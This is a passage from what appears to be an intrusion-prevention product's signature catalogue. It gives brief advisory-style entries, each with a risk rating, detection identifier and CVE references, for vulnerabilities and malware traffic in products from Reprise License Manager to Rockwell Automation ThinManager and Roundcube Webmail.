Software: Reprise Software License Manager; Borland AccuRev
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in the Reprise License Manager. The vulnerability is due to insufficient input validation of the actserver and akey parameters while processing a number of HTTP requests. Successful exploitation would lead to arbitrary code execution under the security context of the running process. An unsuccessful exploit attempt would lead to the rlm.exe process terminating abnormally, denying service to legitimate users.
Situation: HTTP_CRL-Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow
Back to top

Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal

About this vulnerability: A vulnerability in Responsive File Manager Responsive File Manager
Risk: Moderate
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Responsive File Manager
Type: Directory Traversal
Description: Insufficient sanitization of directory traversal characters by the ajax_calls.php causes a directory traversal vulnerability in Responsive File Manager. A successful attack may allow an attacker to read arbitrary files on the target system.
Situation: HTTP_CRL-Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal
References:
CVE-2018-20792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20792
Back to top

Responsive-Filemanager-Ajax_calls.php-Information-Disclosure

About this vulnerability: A vulnerability in Responsive File Manager Responsive File Manager
Risk: Moderate
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: Responsive File Manager
Type: Directory Traversal
Description: There has been reported a directory traversal vulnerability in Responsive FileManager. This vulnerability is remotely exploitable. Successful exploitation could lead arbitrary file read on the target server.
Situation: HTTP_CSU-Path-Traversal-Sequence-In-File-Name
References:
CVE-2018-15535
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15535
Back to top

Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal

About this vulnerability: A vulnerability in Responsive File Manager
Risk: Moderate
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Responsive File Manager
Type: Input Validation
Description: There has been reported a directory traversal vulnerability in Responsive FileManager. This vulnerability can be exploited remotely without authentication. Successful exploitation might lead in arbitrary code execution.
Situation: HTTP_CRL-Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal
References:
CVE-2018-15536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15536
Back to top

RevCode-RAT-C2-Traffic

About this vulnerability: RevCode RAT C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: RevCode is a remote access trojan capable to fully control the target system. Infected systems are controlled from a web page based command and control server hosted by the RevCoder seller.
Situation: HTTP_CRL-RevCode-RAT-C2-Traffic
Back to top

RevengeRAT-Malware-C2-Traffic

About this vulnerability: RevengeRAT malware C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: RevengeRAT is a remote access trojan capable to perform many different tasks such as logging keystrokes in the infected systems.
Situation: Generic_CS-RevengeRAT-Malware-C2-Traffic
Back to top

ReverseRAT-Infection-Traffic

About this vulnerability: ReverseRAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1378-5242
Last changed: sgpkg-ips-1378-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: ReverseRAT infection traffic was detected.
Situation: HTTP_CSU-ReverseRAT-Infection-Traffic
Back to top

Reveton-Botnet

About this vulnerability: Reveton botnet traffic
Risk: Moderate
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1793-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Reveton is a malicious botnet known for a peculiar category of monetization, called ransomware. The main focus of Reveton's monetization is to lock access to a user's computer and demand ransom in return, apparently to unlock the computer. However, Reveton has the ability to download arbitrary malicious functionality, so its monetization is not restricted to the above.
Back to top

Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal

About this vulnerability: A vulnerability in Rhino Software Serv-U FTP Server
Risk: Moderate
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Serv-U FTP Server
Type: Input Validation
Description: There is a directory traversal vulnerability in the Rhino Software Serv-U FTP Server. The vulnerability is due to an input validation error in server that does not properly sanitize the RNTO command. Successful exploitation allows authenticated remote attackers to write arbitrary files to any location on the vulnerable server.
Situation: FTP_CS-Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal
References:
BID-31563
http://www.securityfocus.com/bid/31563
Back to top

Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow

About this vulnerability: A vulnerability in Rhino Software Serv-U
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Serv-U HTTP Server
Type: Buffer Overflow
Description: A code execution vulnerability exists in Rhino Software Serv-U. The vulnerability is due to a buffer overflow that can occur when Servu-U Web Client handles HTTP requests containing overly large session Cookie values. Remote attackers could exploit this vulnerability by sending a malicious HTTP request to a vulnerable version of the application. Successful exploitation of this vulnerability would result in arbitrary code injection and execution with the privileges of the affected service. If code execution is not successful, the affected application may terminate abnormally.
Situation: HTTP_CSH-Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow
References:
CVE-2009-4006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4006
Back to top

RichFaces-Framework-Expression-Language-Injection-CVE-2018-12533

About this vulnerability: A vulnerability in RichFaces framework
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Generic
Software: RichFaces framework
Type: Malfunction
Description: An expression language injection has been reported in the RichFaces framework versions 3.1.0 through 3.3.4. An unauthenticated attacker can exploit this vulnerability by using a maliciously crafted Java serialized object in an HTTP request. A successful exploit can lead into arbitrary code execution.
Situation: HTTP_CSU-RichFaces-Framework-DATA-URL-Segment-With-Compressed-Content
HTTP_CSU-RichFaces-Framework-Expression-Language-Injection-Known-Payload
References:
CVE-2018-12533
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12533
Back to top

RichFaces-Framework-Expression-Language-Injection-CVE-2018-14667

About this vulnerability: A vulnerability in RichFaces framework
Risk: High
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Platform: Generic
Software: RichFaces framework
Type: Malfunction
Description: An expression language injection has been reported in the RichFaces framework versions 3.x through 3.3.4. An unauthenticated attacker can exploit this vulnerability by using a maliciously crafted Java serialized object in an HTTP request. A successful exploit can lead into arbitrary code execution.
Situation: HTTP_CSU-RichFaces-Framework-DATA-URL-Segment-With-Compressed-Content
HTTP_CSU-RichFaces-Framework-Expression-Language-Injection-Known-Payload
References:
CVE-2018-14667
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14667
Back to top

RKD-Software-BarCodeAx.dll-Buffer-Overflow

About this vulnerability: An RKD Software BarCodeAx.dll Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-732-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: RKD Software
Type: Buffer Overflow
Description: A buffer overflow vulnerability in RKD Software, in BarCodeAx.dll, version 4.9, which allows remote attackers to execute arbitrary code via a long BeginPrint argument.
Situation: File-Text_RKD-Software-BarCodeAx.dll-Buffer-Overflow
References:
CVE-2007-3435
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3435
BID-24596
http://www.securityfocus.com/bid/24596
OSVDB-37482
http://www.osvdb.org/37482
Back to top

Rlpr-Msg-Format-Strings-Vulnerability

About this vulnerability: Remotely exploitable format strings vulnerability
Risk: High
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: rlpr
Type: Format String
Description: Format strings vulnerability in the rlprd daemon allows a remote attacker to execute arbitrary code on the target server. This can lead to a remote compromise of the server.
Situation: Generic_Rlpr-Format-Strings-Attack
References:
CVE-2004-0393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0393
BID-10578
http://www.securityfocus.com/bid/10578
Back to top

Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection

About this vulnerability: A vulnerability in Rocket Chat
Risk: Moderate
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Platform: Generic
Software: Rocket Chat
Type: Input Validation
Description: Improper input validation in the password reset function causes a noSQL injection vulnerability in Rocket Chat. A successful Rocket Chat Pre-Auth Blind NoSQL Injection
Situation: HTTP_CRL-Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection
References:
CVE-2021-22911
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22911
Back to top

Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal

About this vulnerability: A vulnerability in Rocket software Servergraph Admin Center for TSM
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rocket software Servergraph Admin Center for TSM
Type: Directory Traversal
Description: A denial of service vulnerability exists in Rocket Servergraph, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. The vulnerability is due to a directory traversal when handling requests to the URI's fileRequestor. A remote unauthenticated attacker can exploit the vulnerability to delete files on the target server.
Situation: HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal
References:
CVE-2014-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3914
OSVDB-107677
http://www.osvdb.org/107677
Back to top

Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal

About this vulnerability: A vulnerability in Rocket software Servergraph Admin Center for TSM
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rocket software Servergraph Admin Center for TSM
Type: Directory Traversal
Description: A code execution vulnerability exists in Rocket Servergraph Admin Center for TSM, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. The vulnerability is due to a directory traversal within the fileRequestServlet servlet. A remote unauthenticated attacker can exploit this vulnerability to achieve arbitrary code execution under the context of the SYSTEM user.
Situation: HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal
References:
CVE-2014-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3914
OSVDB-107680
http://www.osvdb.org/107680
Back to top

Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability

About this vulnerability: A vulnerability in Rocket software Servergraph Admin Center for TSM
Risk: High
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rocket software Servergraph Admin Center for TSM
Type: Directory Traversal
Description: Multiple vulnerabilities exist in Rocket Servergraph, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. These vulnerabilities are due to input validation errors when handling requests to the URIs fileRequestor. A remote unauthenticated attacker can exploit these vulnerabilities to achieve arbitrary command execution under the context of the SYSTEM user.
Situation: HTTP_CRL-Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability
References:
CVE-2014-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3914
OSVDB-107679
http://www.osvdb.org/107679
Back to top

Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution

About this vulnerability: A vulnerability in Rocket software Servergraph Admin Center for TSM
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rocket software Servergraph Admin Center for TSM
Type: Input Validation
Description: Multiple vulnerabilities exist in Rocket Servergraph, an interface for monitoring backup solutions such as IBM Tivoli Storage Manager, Symantec NetBackup etc. These vulnerabilities are due to input validation errors when handling requests to the URIs userRequest and tsmRequest. A remote unauthenticated attacker can exploit these vulnerabilities to achieve arbitrary command execution under the context of the SYSTEM user.
Situation: HTTP_CRL-Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution
References:
CVE-2014-3915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3915
BID-67780
http://www.securityfocus.com/bid/67780
OSVDB-107681
http://www.osvdb.org/107681
Back to top

Rockwell-Automation-CCW-ccwsln-External-Entity-Injection

About this vulnerability: A vulnerability in Rockwell Automation Connected Components Workbench.
Risk: High
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Platform: Generic
Software: Rockwell Automation Connected Components Workbench
Type: Input Validation
Description: A vulnerability in Rockwell Automation Connected Components Workbench, versions v12.00 and prior, which allows remote attackers to disclose file contents for any file readable by the user running the application by enticing the victims to open a malicious link or file, due to a failure on part of the application to properly parse XML files.
Situation: File-TextId_Rockwell-Automation-CCW-ccwsln-External-Entity-Injection
References:
CVE-2022-1018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1018
Back to top

Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization

About this vulnerability: A vulnerability in Rockwell Automation FactoryTalk Diagnostics
Risk: Moderate
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rockwell Automation FactoryTalk Diagnostics
Type: Input Validation
Description: Insecure deserialization of data sent to the RNADiagnosticsSrv endpoint of Rockwell Automation FactoryTalk Diagnostics causes a vulnerability that can be exploited to gain the ability to execute arbitrary code on the target system.
Situation: HTTP_CRL-Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization
References:
CVE-2020-6967
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6967
Back to top

Rockwell-Automation-Factorytalk-SE-RCE

About this vulnerability: An attempt to exploit a vulnerability in Rockwell FactoryTalk View SE
Risk: High
First detected in: sgpkg-ips-1342-5242
Last changed: sgpkg-ips-1342-5242
Platform: Generic
Software: Rockwell FactoryTalk View SE
Type: Input Validation
Description: There exists a vulberability in Rockwell FactoryTalk View SE SCADA which allows unathenticated users to gain sensitive information by project copy requests, modify or create critical files via directory traversal, and to create a race condition to trigger code execution.
Situation: HTTP_CSU-Rockwell-Automation-Factorytalk-SE-RCE
References:
CVE-2020-12029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12029
Back to top

Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal

About this vulnerability: A vulnerability in Rockwell Automation ISaGRAF Workbench.
Risk: High
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Platform: Generic
Software: Rockwell Automation ISaGRAF Workbench
Type: Directory Traversal
Description: A vulnerability in Rockwell Automation ISaGRAF Workbench, versions v6.0 - v6.6.9, which allows remote attackers to execute arbitrary code by enticing the user to open a crafted exchange file, due to a lack of proper input validation of names of files included in 7-ZIP files opened by the program.
Situation: File-Binary_Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal
References:
CVE-2022-2463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2463
Back to top

Rockwell-Automation-Micrologix-PLC-Default-Credentials-CVE-2016-5645

About this vulnerability: A vulnerability in Rockwell Automation MicroLogix PLC
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: Rockwell Automation MicroLogix PLC
Type: Backdoor
Description: Various Rockwell Automation MicroLogix PLC products use a hardcoded SNMP community string for applying firmware updates. A remote attacker can use this to load arbitrary firmware on the device.
Situation: SNMP-UDP_Rockwell-Automation-Micrologix-PLC-Default-Community-String-Usage
References:
CVE-2016-5645
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5645
Back to top

Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Rockwell Automation RSLinx Classic
Risk: Moderate
First detected in: sgpkg-ips-1127-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rockwell Automation RSLinx Classic
Type: Buffer Overflow
Description: Improper parsing of EtherNet/IP SendRRData messages causes a heap buffer overflow vulnerability in Rockwell Automation RSLinx Classic. A successful exploit allows an attacker to crash the target system or possibly code execution.
Situation: Generic_CS-Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow
References:
CVE-2018-14821
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14821
Back to top

Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-BOF

About this vulnerability: A vulnerability in Rockwell Automation RSLinx Classic
Risk: Moderate
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rockwell Automation RSLinx Classic
Type: Buffer Overflow
Description: Improper handling of CIP SendRRData messages with overly large size field within the Electronic Key segment in the Connection Path causes a stack buffer overflow vulnerability in Rockwell Automation RSLinx Classic. A successful exploit can crash the target application.
Situation: Generic_CS-Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-Buffer-Overflow
References:
CVE-2019-6553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6553
Back to top

Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS

About this vulnerability: A vulnerability in Rockwell Automation RSLinx Classic.
Risk: High
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Generic
Software: Rockwell Automation RSLinx Classic
Type: Input Validation
Description: A vulnerability in Rockwell Automation RSLinx Classic, versions 4.12.00 and before, which allows remote attackers to cause a denial of service condition by sending specially crafted packets to the vulnerable server.
Situation: Generic_CS-Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS
References:
CVE-2020-13573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13573
Back to top

Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service

About this vulnerability: A vulnerability in Rockwell Automation RSLogix 5000
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Rockwell Automation RSLogix 5000
Type: Buffer Overflow
Description: There is a denial of service vulnerability in RSLogix 5000. An attacker can cause a restart by sending a crafted rna packet.
Situation: Generic_CS-Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service
References:
CVE-2011-3489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3489
BID-49608
http://www.securityfocus.com/bid/49608
Back to top

Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: High
First detected in: sgpkg-ips-1581-5242
Last changed: sgpkg-ips-1581-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Rockwell Automation ThinManager. The vulnerability is due to improper validation of user data in the ThinServer component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal
References:
CVE-2023-27855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27855
Back to top

Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: High
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Rockwell Automation ThinManager ThinServer can allow an unauthenticated attacker to crash ThinServer.exe with a crafted Type 7 message.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857
References:
CVE-2023-27857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27857
Back to top

Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: Moderate
First detected in: sgpkg-ips-1823-5242
Last changed: sgpkg-ips-1823-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Directory Traversal
Description: Improper validation of user data when processing a crafted POST request causes a directory traversal vulnerability in Rockwell Automation ThinManager ThinServer. A successful exploitation allows an attacker to write files in arbitrary locations and possibly execute code on the target system.
Situation: HTTP_CRL-Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal
References:
CVE-2024-45826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45826
Back to top

Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Directory Traversal
Description: Improper validation of user data in the ThinServer component causes a directory traversal vulnerability in Rockwell Automation ThinManager ThinServer. A successful exploit may allow an attacker to access arbitrary files on the target system.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal
References:
CVE-2023-27856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27856
Back to top

Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: Moderate
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Input Validation
Description: An input validation flaw when parsing packets containing variable field sizes in the Monitor Thread component causes a denial of service vulnerability in Rockwell Automation ThinManager ThinServer.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read
References:
CVE-2024-10387
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10387
Back to top

Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: High
First detected in: sgpkg-ips-1627-5242
Last changed: sgpkg-ips-1627-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported for Rockwell Automation ThinManager ThinServer. This vulnerability is due to improper input validation when handling Type 13 synchronization messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow
References:
CVE-2023-2914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2914
Back to top

Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: High
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Malfunction
Description: A missing authorization vulnerability has been reported in Rockwell Automation ThinManager. The vulnerability is due to a flaw in access control when handling Type 17 messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in execution of arbitrary database queries.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization
References:
CVE-2024-10386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10386
Back to top

Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Directory Traversal
Description: A denial of service vulnerability has been reported for Rockwell Automation ThinManager ThinServer. This vulnerability is due to a directory traversal in Type 21 messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary deletion of files or, in the worst case, denial of service.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal
References:
CVE-2023-2915
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2915
Back to top

Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal

About this vulnerability: A vulnerability in Rockwell Automation ThinManager ThinServer
Risk: High
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Platform: Generic
Software: Rockwell Automation ThinManager ThinServer
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Rockwell Automation ThinManager. The vulnerability is due to improper validation of user data in synchronization type 38 messages that is used in file operations. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in an attacker writing a file to the target server outside of the expected directory, in the worst case, resulting in arbitrary code execution under the security context of the user running the server.
Situation: Generic_CS-Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal
References:
CVE-2023-2917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2917
Back to top

Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization

About this vulnerability: A vulnerability in Rockwell Automation Connected Components Workbench.
Risk: High
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Platform: Generic
Software: Rockwell Automation Connected Components Workbench
Type: Input Validation
Description: A vulnerability in Rockwell Automation, Connected Components Workbench v13.00.00 and prior, ISaGRAF Workbench v6.0 though v6.6.9, Safety Instrumented Systems Workstation v1.2 and prior, which allows remote attackers to execute arbitrary code by enticing the victims to open a malicious link or file, due to an input validation error when processing CCWARC files.
Situation: File-Binary_Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization
References:
CVE-2022-1118
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1118
Back to top

Rockwell-RSLogix-Heap-Overflow-Vulnerability

About this vulnerability: A vulnerability in Rockwell RSLogix
Risk: Moderate
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Rockwell Automation RSLogix 5000
Type: Buffer Overflow
Description: A vulnerability in Rockwell RSLogix allows for Denial of Service and potential remote code execution.
Situation: Generic_CS-Rockwell-RSLogix-Heap-Overflow-Vulnerability
Back to top

Rompager-Rom0-Information-Disclosure

About this vulnerability: A vulnerability in Rompager Embedded Webserver
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Allegro Rompager Web Server
Type: Insecure Configuration
Description: There is an information disclosure vulnerability in Allegro Rompager Web Server. As the program is commonly used in many network devices, it may be used for network password, credential and topology information gathering.
Situation: HTTP_CSU_Rompager-Rom0-Information-Disclosure
References:
CVE-2014-4019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4019
Back to top

Roundcube-Webmail-Arbitrary-File-Read

About this vulnerability: An attempt to exploit a vulnerability in Roundcube Webmail detected
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: RoundCube Webmail
Type: Malfunction
Description: An attempt to exploit a post-auth vulnerability in Roundcube Webmail detected.
Situation: HTTP_CRL-Roundcube-Webmail-Arbitrary-File-Read
References:
CVE-2017-16651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16651
Back to top

Roundcube-Webmail-Archive-IMAP-Command-Injection

About this vulnerability: A vulnerability in RoundCube RoundCube Webmail
Risk: Moderate
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: Improper request validation causes a command injection vulnerability in RoundCube Webmail. A successful exploit allows an attacker to send arbitrary IMAP commands.
Situation: HTTP_CRL-Roundcube-Webmail-Archive-IMAP-Command-Injection
References:
CVE-2018-9846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9846
Back to top

Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure

About this vulnerability: A vulnerability in RoundCube RoundCube Webmail
Risk: Moderate
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: Insufficient validation and sanitization of Cascading Style Sheets in emails causes an information disclosure vulnerability in RoundCube Webmail.
Situation: File-Text_Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure
References:
CVE-2024-42010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42010
Back to top

Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730

About this vulnerability: An attempt to exploit a vulnerability in RoundCube Webmail detected
Risk: High
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
Description: A cross-site scripting (XSS) issue was discovered in Roundcube Webmail before 1.2.13, 1.3.x before 1.3.16, and 1.4.x before 1.4.10. The attacker can send a plain text e-mail message, with JavaScript in a link reference element that is mishandled by "linkref_addindex" in "rcube_string_replacer.php". The vulnerability could be used to exploit, for example, CVE-2021-44026 SQL injection.
Situation: File-Text_Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730
References:
CVE-2020-35730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35730
Back to top

Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in RoundCube Webmail
Risk: High
First detected in: sgpkg-ips-1661-5242
Last changed: sgpkg-ips-1661-5242
Platform: Generic
Software: RoundCube Webmail
Type: Input Validation
